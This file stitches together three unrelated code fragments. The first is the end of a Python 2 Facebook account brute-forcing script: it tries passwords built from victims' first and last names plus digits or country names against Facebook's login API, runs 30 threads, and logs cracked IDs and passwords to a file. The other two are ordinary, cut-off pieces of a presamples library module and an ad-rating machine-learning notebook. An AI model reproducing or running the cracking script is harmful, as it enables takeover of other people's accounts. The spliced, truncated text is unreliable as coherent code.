print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos4
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos4 + '\n')
cek.close()
cpe.append(ubd + bos4)
else:
bos5 = x['first_name'] + '786'
data5 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga5 = json.load(data5)
if 'access_token' in naga5:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos5
oke.append(ubd + bos5)
elif 'www.facebook.com' in naga5['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos5
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos5 + '\n')
cek.close()
cpe.append(ubd + bos5)
else:
bos6 = x['last_name'] + '123'
data6 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga6 = json.load(data6)
if 'access_token' in naga6:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos6
oke.append(ubd + bos6)
elif 'www.facebook.com' in naga6['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos6
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos6 + '\n')
cek.close()
cpe.append(ubd + bos6)
else:
bos7 = x['last_name'] + '1234'
data7 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga7 = json.load(data7)
if 'access_token' in naga7:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos7
oke.append(ubd + bos7)
elif 'www.facebook.com' in naga7['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos7
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos7 + '\n')
cek.close()
cpe.append(ubd + bos7)
else:
bos8 = 'Pakistan'
data8 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga8 = json.load(data8)
if 'access_token' in naga8:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos8
oke.append(ubd + bos8)
elif 'www.facebook.com' in naga8['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos8
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos8 + '\n')
cek.close()
cpe.append(ubd + bos8)
else:
bos9 = x['last_name'] + '786'
data9 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga9 = json.load(data9)
if 'access_token' in naga9:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x9d\x82 ' + bos9
oke.append(ubd + bos9)
elif 'www.facebook.com' in naga9['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x9d\x82 ' + bos9
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos9 + '\n')
cek.close()
cpe.append(ubd + bos9)
else:
bos10 = x['last_name'] + '12345'
data10 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga10 = json.load(data10)
if 'access_token' in naga10:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos10
oke.append(ubd + bos10)
elif 'www.facebook.com' in naga10['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos10
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos10 + '\n')
cek.close()
cpe.append(ubd + bos10)
else:
bos11 = 'Bangladesh'
data11 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=23<PASSWORD>09591655%25257C0<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga11 = json.load(data11)
if 'access_token' in naga11:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos11
oke.append(ubd + bos11)
elif 'www.facebook.com' in naga11['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos11
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos11 + '\n')
cek.close()
cpe.append(ubd + bos11)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;94m+\x1b[1;97m] \x1b[1;97mSelesai ....'
print '\x1b[1;97m[\x1b[1;94m+\x1b[1;97m] \x1b[1;97mTotal \x1b[1;92mOK\x1b[1;97m/\x1b[1;94mCP \x1b[1;97m: \x1b[1;92m' + str(len(oke)) + | |
<reponame>tngTUDOR/presamples
from copy import deepcopy
from pathlib import Path
import json
import numpy as np
import os
import shutil
import uuid
import copy
import warnings
from .errors import InconsistentSampleNumber, ShapeMismatch, NameConflicts
from .utils import validate_presamples_dirpath, md5
try:
from bw2data.utils import TYPE_DICTIONARY
from bw2data import projects, mapping
except ImportError:
TYPE_DICTIONARY = {
"unknown": -1,
"production": 0,
"technosphere": 1,
"biosphere": 2,
"substitution": 3,
}
projects = None
mapping = {}
# Max signed 32 bit integer, compatible with Windows
MAX_SIGNED_32BIT_INT = 2147483647
to_array = lambda x: np.array(x) if not isinstance(x, np.ndarray) else x
to_2d = lambda x: np.reshape(x, (1, -1)) if len(x.shape) == 1 else x
def split_inventory_presamples(samples, indices):
"""Split technosphere and biosphere presamples.
``samples`` is a Numpy array with rows of exchanges and columns of samples. ``indices`` is a list of ``[(input key, output key, type)]``, where ``type`` is like "biosphere" or "technosphere". Everything which isn't type ``biosphere`` will be added to the technosphere presamples.
Returns a list of ((biosphere samples, biosphere indices, label), (technosphere samples, technosphere indices, label)) - but will skip either element if there are no samples.
"""
assert isinstance(samples, np.ndarray)
if samples.shape[0] != len(indices):
raise ShapeMismatch("Shape mismatch: {}, {}".format(samples.shape[0], len(indices)))
mask = np.array([o[2] in (2, 'biosphere') for o in indices])
no_empty = lambda lst: [o for o in lst if o[1]]
return no_empty([
(
samples[mask, :],
[o[:2] for o in indices if o[2] in (2, "biosphere")],
"biosphere"
), (
samples[~mask, :],
[o for o in indices if o[2] not in (2, "biosphere")],
"technosphere"
),
])
def format_technosphere_presamples(indices):
"""Format technosphere presamples into an array.
Input data has the form ``[(input id, output id, type)]``. Both the input and output ids can be mapped already, but normally aren't; the ``type`` may be mapped or not.
Returns an array with columns ``[('input', np.uint32), ('output', np.uint32), ('row', MAX_SIGNED_32BIT_INT), ('col', MAX_SIGNED_32BIT_INT), ('type', np.uint8)]``, and the following metadata::
{
'row from label': 'input',
'row to label': 'row',
'row dict': '_product_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'technosphere_matrix'
}
"""
metadata = {
'row from label': 'input',
'row to label': 'row',
'row dict': '_product_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'technosphere_matrix'
}
dtype = [
('input', np.uint32),
('output', np.uint32),
('row', np.uint32),
('col', np.uint32),
('type', np.uint8),
]
def func(row):
return (
mapping.get(row[0], row[0]),
mapping.get(row[1], row[1]),
MAX_SIGNED_32BIT_INT,
MAX_SIGNED_32BIT_INT,
TYPE_DICTIONARY.get(row[2], row[2])
)
return format_matrix_data(indices, 'technosphere', dtype, func, metadata)
def format_biosphere_presamples(indices):
"""Format biosphere presamples into an array.
Input data has the form ``[(flow id, activity id)]``, where both ids are **unmapped**.
Returns an array with columns ``[('input', np.uint32), ('output', np.uint32), ('row', MAX_SIGNED_32BIT_INT), ('col', MAX_SIGNED_32BIT_INT)]``, and the following metadata::
{
'row from label': 'input',
'row to label': 'row',
'row dict': '_biosphere_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'biosphere_matrix'
}
"""
metadata = {
'row from label': 'input',
'row to label': 'row',
'row dict': '_biosphere_dict',
'col from label': 'output',
'col to label': 'col',
'col dict': '_activity_dict',
'matrix': 'biosphere_matrix'
}
dtype = [
('input', np.uint32),
('output', np.uint32),
('row', np.uint32),
('col', np.uint32),
]
def func(row):
return (
mapping.get(row[0], row[0]),
mapping.get(row[1], row[0]),
MAX_SIGNED_32BIT_INT,
MAX_SIGNED_32BIT_INT,
)
return format_matrix_data(indices, 'biosphere', dtype, func, metadata)
def format_cf_presamples(indices):
"""Format characterization factor presamples into an array.
Input data has the form ``[flow id]``, where ``flow id`` is an **unmapped** biosphere flow key like ``('biosphere', 'something')``.
Returns an array with columns ``[('flow', np.uint32), ('row', MAX_SIGNED_32BIT_INT)]``, and the following metadata::
{
'row from label': 'flow',
'row to label': 'row',
'row dict': '_biosphere_dict',
'matrix': 'characterization_matrix'
}
"""
metadata = {
'row from label': 'flow',
'row to label': 'row',
'row dict': '_biosphere_dict',
'matrix': 'characterization_matrix'
}
dtype = [
('flow', np.uint32),
('row', np.uint32),
]
func = lambda row: (mapping.get(row, row), MAX_SIGNED_32BIT_INT)
return format_matrix_data(indices, 'cf', dtype, func, metadata)
FORMATTERS = {
'technosphere': format_technosphere_presamples,
'biosphere': format_biosphere_presamples,
'cf': format_cf_presamples,
}
def validate_matrix_data_metadata(metadata, dtype):
"""Make sure ``metdata`` has the required keys, and that ``indices`` agress with ``metadata``."""
ROWS = ('row from label', 'row to label', 'row dict', 'matrix')
COLUMNS = ('col from label', 'col to label', 'col dict')
if not all(field in metadata for field in ROWS):
raise ValueError("Must give each of {}".format(ROWS))
if "col dict" in metadata and not \
all(field in metadata for field in COLUMNS):
raise ValueError("Must give each of {}".format(COLUMNS))
col_names = {x[0] for x in dtype}
metadata_names = {v for k, v in metadata.items() if "label" in k}
missing = metadata_names.difference(col_names)
if missing:
raise ValueError("The following necessary columns are not in the "
"indices: {}".format(missing))
def format_matrix_data(indices, kind, dtype=None, row_formatter=None, metadata=None):
if dtype is None and row_formatter is None and metadata is None:
try:
return FORMATTERS[kind](indices)
except KeyError:
raise KeyError("Can't find formatter for {}".format(kind))
elif dtype is None or row_formatter is None or metadata is None:
raise ValueError("Must provide ``dtype``, ``row_formatter``, and ``metadata``")
else:
validate_matrix_data_metadata(metadata, dtype)
array = np.zeros(len(indices), dtype=dtype)
for index, row in enumerate(indices):
array[index] = row_formatter(row)
return array, metadata
def get_presample_directory(id_, overwrite=False, dirpath=None):
if dirpath is None:
if projects:
dirpath = Path(projects.request_directory('presamples')) / id_
else:
dirpath = Path(os.getcwd()) / id_
else:
dirpath = Path(dirpath) / id_
if os.path.isdir(dirpath):
if not overwrite:
raise ValueError("The presampled directory {} already exists".format(dirpath))
else:
shutil.rmtree(dirpath)
os.mkdir(dirpath)
return dirpath
def create_presamples_package(matrix_data=None, parameter_data=None, name=None,
id_=None, overwrite=False, dirpath=None, seed=None, collapse_repeated_indices=True):
"""Create and populate a new presamples package
The presamples package minimally contains a datapackage file with metadata on the
datapackage itself and its associated resources (stored presample arrays and
identification of what the values in the arrays represent).
Parameters
----------
matrix_data: list, optional
list of tuples containing raw matrix data (presamples array, indices, matrix label)
parameter_data: list, optional
list of tuples containing raw parameter data (presamples array, names, label)
name: str, optional
A human-readable name for these samples.
\id_: str, optional
Unique id for this collection of presamples. Optional, generated automatically if not set.
overwrite: bool, default=False
If True, replace an existing presamples package with the same ``\id_`` if it exists.
dirpath: str, optional
An optional directory path where presamples can be created. If None, a subdirectory in the ``project`` folder.
seed: {None, int, "sequential"}, optional
Seed used by indexer to return array columns in random order. Can be an integer, "sequential" or None.
collapse_repeated_indices: bool, default=True
Indicates whether samples for the same matrix cell in a given array should be summed.
If False then only the last sample values are used.
Notes
----
Both ``matrix_data`` and ``parameter_data`` are optional, but at least one needs to be passed.
The documentation gives more details on these input arguments.
Both matrix and parameter data should have the same number of possible values (i.e same number of samples).
The documentations provide more information on the format for these two arguments.
Returns
-------
id_: str
The unique ``id_`` of the presamples package
dirpath: str
The absolute path of the created directory.
"""
id_ = id_ or uuid.uuid4().hex
name = name or id_
if dirpath is not None:
assert os.path.isdir(dirpath), "`dirpath` must be a directory"
assert os.access(dirpath, os.W_OK), "`dirpath` must be a writable directory"
dirpath = os.path.abspath(dirpath)
dirpath = get_presample_directory(id_, overwrite, dirpath=dirpath)
num_iterations = None
datapackage = {
"name": str(name),
"id": id_,
"profile": "data-package",
"seed": seed,
"resources": []
}
if not matrix_data and not parameter_data:
raise ValueError("Must specify at least one of `matrix_data` and `parameter_data`")
def elems(lst, label):
"""Yield elements from ``lst``. If an element is a model instance, iterate over its components."""
for elem in lst:
if hasattr(elem, label):
for obj in getattr(elem, label):
yield obj
else:
yield elem
# Not defined if matrix_data is empty
index = -1
for index, row in enumerate(elems(matrix_data or [], "matrix_data")):
samples, indices, kind, *other = row
samples = to_2d(to_array(samples))
if num_iterations is None:
num_iterations = samples.shape[1]
if samples.shape[1] != num_iterations:
raise InconsistentSampleNumber("Inconsistent number of samples: "
"{} and {}".format(samples.shape[1], num_iterations))
indices, metadata = format_matrix_data(indices, kind, *other)
if kind in ['technosphere', 'biosphere']:
if collapse_repeated_indices: # Avoid cf matrices for now
samples, indices = collapse_matrix_indices(samples, indices, kind)
else:
io_cols = indices[['input', 'output']]
unique = np.unique(io_cols)
if len(unique) != samples.shape[0]:
warnings.warn(UserWarning('Multiple samples in a given array were supplied | |
#!/usr/bin/env python
# coding: utf-8
# ! ./setup.sh # uncomment if you wish to install any new packages
get_ipython().run_line_magic('matplotlib', 'inline')
import tensorflow as tf
import tensorflow_docs as tfdocs
import tensorflow_docs.modeling
import sys
from pathlib import Path
import datetime
import time
import numpy as np
import pandas as pd
from pprint import pprint
from typing import Dict, Any, Union, List, Tuple
from functools import partial
import re
import string
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.metrics import confusion_matrix
from math import ceil
from collections import namedtuple
from sklearn.model_selection import train_test_split
import pickle
import chakin
import json
import os
from collections import defaultdict
import zipfile
import sqlite3
import logging
from tempfile import TemporaryDirectory
from fastprogress import progress_bar
from imblearn.over_sampling import SMOTE
from imblearn.under_sampling import NearMiss
from imblearn.over_sampling import RandomOverSampler
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Embedding
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import concatenate
from aif360.metrics import BinaryLabelDatasetMetric
from aif360.algorithms.preprocessing import Reweighing
from aif360.datasets import BinaryLabelDataset # To handle the data
import matplotlib.pyplot as plt
import seaborn as sns
from EmbeddingFactory import EmbeddingFactory
pd.set_option('display.max_rows', None)
print(f"Using Tensorflow, {tf.__version__} on Python interpreter, {sys.version_info}")
RANDOM_SEED = int(time.time())
tf.random.set_seed(RANDOM_SEED)
np.random.seed(RANDOM_SEED)
print(f"Using random seed, {RANDOM_SEED}")
DATA_FOLDER = Path("../../dataset/")
BATCH_SIZE = 4096 # bigger the batch, faster the training but bigger the RAM needed
TARGET_COL = "Rating"
# data files path are relative DATA_FOLDER
users_ads_rating_csv = DATA_FOLDER/"users-ads-without-gcp-ratings_OHE_MLB_FAV_UNFAV_Merged.csv"
USER_ID = "UserId"
AD_ID = "AdId"
AGE = "Age"
ZIP_CODE = "CapZipCode"
COUNTRIES_VISITED = "Countriesvisited"
FAVE_SPORTS = "FaveSports"
GENDER = "Gender"
HOME_COUNTRY = "Homecountry"
HOME_TOWN = "Hometown"
INCOME = "Income"
LAST_NAME = "LastName"
MOST_LISTENED_MUSICS = "Mostlistenedmusics"
MOST_READ_BOOKS = "Mostreadbooks"
MOST_VISITED_WEBSITES = "Mostvisitedwebsites"
MOST_WATCHED_MOVIES = "Mostwatchedmovies"
MOST_WATCHED_TV_PROGRAMMES = "Mostwatchedtvprogrammes"
NAME = "Name"
PAYPAL = "Paypal"
TIMEPASS = "Timepass"
TYPE_OF_JOB = "TypeofJob"
WEEKLY_WORKING_HOURS = "Weeklyworkinghours"
ADFILEPATH = "AdFilePath"
GENDER_F = "Gender_F"
GENDER_M = "Gender_M"
# HomeCountry = 12 Columns
HOMECOUNTRY_CANADA = "Homecountry_Canada"
HOMECOUNTRY_CZECHREPUBLIC = "Homecountry_CzechRepublic"
HOMECOUNTRY_GREATBRITAIN = "Homecountry_GreatBritain"
HOMECOUNTRY_INDIA = "Homecountry_India"
HOMECOUNTRY_ITALY = "Homecountry_Italy"
HOMECOUNTRY_PHILLIPINES = "Homecountry_Phillipines"
HOMECOUNTRY_ROMANIA = "Homecountry_Romania"
HOMECOUNTRY_SAUDIARABIA = "Homecountry_SaudiArabia"
HOMECOUNTRY_SINGAPORE = "Homecountry_Singapore"
HOMECOUNTRY_SLOVENIA = "Homecountry_Slovenia"
HOMECOUNTRY_UNITEDKINGDOM = "Homecountry_UnitedKingdom"
HOMECOUNTRY_UNITEDSTATESOFAMERICA = "Homecountry_UnitedStatesofAmerica"
# Income = 4 Columns
INCOME_0 = "Income_0"
INCOME_1 = "Income_1"
INCOME_2 = "Income_2"
INCOME_3 = "Income_3"
# Mostlistenedmusics = 22 Columns
MOSTLISTENEDMUSICS_1 = "AlternativeMusic"
MOSTLISTENEDMUSICS_2 = "AsianPopJPoporKpop"
MOSTLISTENEDMUSICS_3 = "Blues"
MOSTLISTENEDMUSICS_4 = "ClassicalMusic"
MOSTLISTENEDMUSICS_5 = "CountryMusic"
MOSTLISTENEDMUSICS_6 = "DanceMusic"
MOSTLISTENEDMUSICS_7 = "EasyListening"
MOSTLISTENEDMUSICS_8 = "ElectronicMusic"
MOSTLISTENEDMUSICS_9 = "EuropeanMusicFolkPop"
MOSTLISTENEDMUSICS_10 = "HipHopRap"
MOSTLISTENEDMUSICS_11 = "IndiePop"
MOSTLISTENEDMUSICS_12 = "InspirationalinclGospel"
MOSTLISTENEDMUSICS_13 = "Jazz"
MOSTLISTENEDMUSICS_14 = "LatinMusic"
MOSTLISTENEDMUSICS_15 = "NewAge"
MOSTLISTENEDMUSICS_16 = "Opera"
MOSTLISTENEDMUSICS_17 = "PopPopularmusic"
MOSTLISTENEDMUSICS_18 = "RampBSoul"
MOSTLISTENEDMUSICS_19 = "Reggae"
MOSTLISTENEDMUSICS_20 = "Rock"
MOSTLISTENEDMUSICS_21 = "SingerSongwriterincFolk"
MOSTLISTENEDMUSICS_22 = "WorldMusicBeats"
# Mostreadbooks = 31 Columns
MOSTREADBOOKS_1 = "ActionandAdventure"
MOSTREADBOOKS_2 = "Anthologies"
MOSTREADBOOKS_3 = "Art"
MOSTREADBOOKS_4 = "Autobiographies"
MOSTREADBOOKS_5 = "Biographies"
MOSTREADBOOKS_6 = "Childrens"
MOSTREADBOOKS_7 = "Childrensliterature"
MOSTREADBOOKS_8 = "Comics"
MOSTREADBOOKS_9 = "Cookbooks"
MOSTREADBOOKS_10 = "Diaries"
MOSTREADBOOKS_11 = "Drama"
MOSTREADBOOKS_12 = "Encyclopedias"
MOSTREADBOOKS_13 = "Eroticfiction"
MOSTREADBOOKS_14 = "Fantasy"
MOSTREADBOOKS_15 = "Guide"
MOSTREADBOOKS_16 = "History"
MOSTREADBOOKS_17 = "Horror"
MOSTREADBOOKS_18 = "Journals"
MOSTREADBOOKS_19 = "Math"
MOSTREADBOOKS_20 = "Mystery"
MOSTREADBOOKS_21 = "Poetry"
MOSTREADBOOKS_22 = "Prayerbooks"
MOSTREADBOOKS_23 = "Religious"
MOSTREADBOOKS_24 = "Romance"
MOSTREADBOOKS_25 = "Satire"
MOSTREADBOOKS_26 = "Science"
MOSTREADBOOKS_27 = "Sciencefiction"
MOSTREADBOOKS_28 = "Selfhelp"
MOSTREADBOOKS_29 = "Series"
MOSTREADBOOKS_30 = "Travel"
MOSTREADBOOKS_31 = "Trilogies"
# Mostwatchedmovies = 21 Columns
MOSTWATCHEDMOVIES_1 = "Mostwatchedmovies_Action"
MOSTWATCHEDMOVIES_2 = "Mostwatchedmovies_Adventure"
MOSTWATCHEDMOVIES_3 = "Mostwatchedmovies_Animation"
MOSTWATCHEDMOVIES_4 = "Mostwatchedmovies_Biography"
MOSTWATCHEDMOVIES_5 = "Mostwatchedmovies_Comedy"
MOSTWATCHEDMOVIES_6 = "Mostwatchedmovies_CrimeandGangster"
MOSTWATCHEDMOVIES_7 = "Mostwatchedmovies_Documentary"
MOSTWATCHEDMOVIES_8 = "Mostwatchedmovies_Drama"
MOSTWATCHEDMOVIES_9 = "Mostwatchedmovies_EpicHistorical"
MOSTWATCHEDMOVIES_10 = "Mostwatchedmovies_Erotic"
MOSTWATCHEDMOVIES_11 = "Mostwatchedmovies_Family"
MOSTWATCHEDMOVIES_12 = "Mostwatchedmovies_Fantasy"
MOSTWATCHEDMOVIES_13 = "Mostwatchedmovies_Horror"
MOSTWATCHEDMOVIES_14 = "Mostwatchedmovies_Musical"
MOSTWATCHEDMOVIES_15 = "Mostwatchedmovies_Mystery"
MOSTWATCHEDMOVIES_16 = "Mostwatchedmovies_Romance"
MOSTWATCHEDMOVIES_17 = "Mostwatchedmovies_SciFi"
MOSTWATCHEDMOVIES_18 = "Mostwatchedmovies_Sport"
MOSTWATCHEDMOVIES_19 = "Mostwatchedmovies_Thriller"
MOSTWATCHEDMOVIES_20 = "Mostwatchedmovies_War"
MOSTWATCHEDMOVIES_21 = "Mostwatchedmovies_Western"
# Mostwatchedtvprogrammes = 11 Columns
MOSTWATCHEDTVPROGRAMMES_1 = "Mostwatchedtvprogrammes_Childrens"
MOSTWATCHEDTVPROGRAMMES_2 = "Mostwatchedtvprogrammes_Comedy"
MOSTWATCHEDTVPROGRAMMES_3 = "Mostwatchedtvprogrammes_Drama"
MOSTWATCHEDTVPROGRAMMES_4 = "Mostwatchedtvprogrammes_EntertainmentVarietyShows"
MOSTWATCHEDTVPROGRAMMES_5 = "Mostwatchedtvprogrammes_Factual"
MOSTWATCHEDTVPROGRAMMES_6 = "Mostwatchedtvprogrammes_Learning"
MOSTWATCHEDTVPROGRAMMES_7 = "Mostwatchedtvprogrammes_Music"
MOSTWATCHEDTVPROGRAMMES_8 = "Mostwatchedtvprogrammes_News"
MOSTWATCHEDTVPROGRAMMES_9 = "Mostwatchedtvprogrammes_ReligionampEthics"
MOSTWATCHEDTVPROGRAMMES_10 = "Mostwatchedtvprogrammes_Sport"
MOSTWATCHEDTVPROGRAMMES_11 = "Mostwatchedtvprogrammes_Weather"
RATING = "Rating"
AD_NUM_FACES = "ad_num_faces"
AD_LABEL_FEATURE_1 = 'ad_isAdvertising'
AD_LABEL_FEATURE_2 = 'ad_isBrand'
AD_LABEL_FEATURE_3 = 'ad_isElectronicdevice'
AD_LABEL_FEATURE_4 = 'ad_isElectronics'
AD_LABEL_FEATURE_5 = 'ad_isFashionaccessory'
AD_LABEL_FEATURE_6 = 'ad_isFictionalcharacter'
AD_LABEL_FEATURE_7 = 'ad_isFont'
AD_LABEL_FEATURE_8 = 'ad_isFurniture'
AD_LABEL_FEATURE_9 = 'ad_isGadget'
AD_LABEL_FEATURE_10 = 'ad_isGames'
AD_LABEL_FEATURE_11 = 'ad_isGraphicdesign'
AD_LABEL_FEATURE_12 = 'ad_isGraphics'
AD_LABEL_FEATURE_13 = 'ad_isJewellery'
AD_LABEL_FEATURE_14 = 'ad_isLine'
AD_LABEL_FEATURE_15 = 'ad_isLogo'
AD_LABEL_FEATURE_16 = 'ad_isMagenta'
AD_LABEL_FEATURE_17 = 'ad_isMaterialproperty'
AD_LABEL_FEATURE_18 = 'ad_isMultimedia'
AD_LABEL_FEATURE_19 = 'ad_isProduct'
AD_LABEL_FEATURE_20 = 'ad_isRectangle'
AD_LABEL_FEATURE_21 = 'ad_isSkin'
AD_LABEL_FEATURE_22 = 'ad_isTechnology'
AD_LABEL_FEATURE_23 = 'ad_isText'
AD_LABEL_FEATURE_24 = 'ad_isVehicle'
AD_LABEL_FEATURE_25 = 'ad_isYellow'
AD_SAFESEARCH_FEATURE_1 = 'ad_isAdult_UNLIKELY'
AD_SAFESEARCH_FEATURE_2 ='ad_isAdult_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_3 ='ad_isSpoof_POSSIBLE'
AD_SAFESEARCH_FEATURE_4 ='ad_isSpoof_UNLIKELY'
AD_SAFESEARCH_FEATURE_5 ='ad_isSpoof_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_6 ='ad_isMedical_POSSIBLE'
AD_SAFESEARCH_FEATURE_7 ='ad_isMedical_UNLIKELY'
AD_SAFESEARCH_FEATURE_8 ='ad_isMedical_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_9 ='ad_isViolence_VERY_UNLIKELY'
AD_SAFESEARCH_FEATURE_10 ='ad_isRacy_POSSIBLE'
AD_SAFESEARCH_FEATURE_11 ='ad_isRacy_UNLIKELY'
AD_SAFESEARCH_FEATURE_12 ='ad_isRacy_VERY_LIKELY'
AD_SAFESEARCH_FEATURE_13 ='ad_isRacy_VERY_UNLIKELY'
AD_OBJECT_FEATURE_1 = 'ad_isAnimal'
AD_OBJECT_FEATURE_2 ='ad_isBelt'
AD_OBJECT_FEATURE_3 ='ad_isBottle'
AD_OBJECT_FEATURE_4 ='ad_isBox'
AD_OBJECT_FEATURE_5 ='ad_isCameralens'
AD_OBJECT_FEATURE_6 ='ad_isChair'
AD_OBJECT_FEATURE_7 ='ad_isClothing'
AD_OBJECT_FEATURE_8 ='ad_isEarrings'
AD_OBJECT_FEATURE_9 ='ad_isFood'
AD_OBJECT_FEATURE_10 ='ad_isHat'
AD_OBJECT_FEATURE_11 ='ad_isLuggagebags'
AD_OBJECT_FEATURE_12 ='ad_isMobilephone'
AD_OBJECT_FEATURE_13 ='ad_isNecklace'
AD_OBJECT_FEATURE_14 ='ad_isPackagedgoods'
AD_OBJECT_FEATURE_15 ='ad_isPants'
AD_OBJECT_FEATURE_16 ='ad_isPen'
AD_OBJECT_FEATURE_17 ='ad_isPerson'
AD_OBJECT_FEATURE_18 ='ad_isPillow'
AD_OBJECT_FEATURE_19 ='ad_isPoster'
AD_OBJECT_FEATURE_20 ='ad_isShoe'
AD_OBJECT_FEATURE_21 ='ad_isTop'
AD_OBJECT_FEATURE_22 ='ad_isToy'
AD_OBJECT_FEATURE_23 ='ad_isWatch'
AD_OBJECT_FEATURE_24 ='ad_isWheel'
FAV = 'fav'
UNFAV = 'unfav'
# Read all columns as strings to avoid any errors
COL_DEFAULTS = {
USER_ID: "**",
AD_ID: "**",
AGE: "**",
ZIP_CODE: "**",
COUNTRIES_VISITED: "**",
FAVE_SPORTS: "**",
GENDER: "**",
HOME_COUNTRY: "**",
HOME_TOWN: "**",
INCOME: "**",
LAST_NAME: "**",
MOST_LISTENED_MUSICS: "**",
MOST_READ_BOOKS: "**",
MOST_VISITED_WEBSITES: "**",
MOST_WATCHED_MOVIES: "**",
MOST_WATCHED_TV_PROGRAMMES: "**",
NAME: "**",
PAYPAL: "**",
TIMEPASS: "**",
TYPE_OF_JOB: "**",
WEEKLY_WORKING_HOURS: "**",
ADFILEPATH: "**",
GENDER_F: "**",
GENDER_M: "**",
HOMECOUNTRY_CANADA: "**",
HOMECOUNTRY_CZECHREPUBLIC: "**",
HOMECOUNTRY_GREATBRITAIN: "**",
HOMECOUNTRY_INDIA: "**",
HOMECOUNTRY_ITALY: "**",
HOMECOUNTRY_PHILLIPINES: "**",
HOMECOUNTRY_ROMANIA: "**",
HOMECOUNTRY_SAUDIARABIA: "**",
HOMECOUNTRY_SINGAPORE: "**",
HOMECOUNTRY_SLOVENIA: "**",
HOMECOUNTRY_UNITEDKINGDOM: "**",
HOMECOUNTRY_UNITEDSTATESOFAMERICA: "**",
INCOME_0: "**",
INCOME_1: "**",
INCOME_2: "**",
INCOME_3: "**",
MOSTLISTENEDMUSICS_1: "**",
MOSTLISTENEDMUSICS_2: "**",
MOSTLISTENEDMUSICS_3: "**",
MOSTLISTENEDMUSICS_4: "**",
MOSTLISTENEDMUSICS_5: "**",
MOSTLISTENEDMUSICS_6: "**",
MOSTLISTENEDMUSICS_7: "**",
MOSTLISTENEDMUSICS_8: "**",
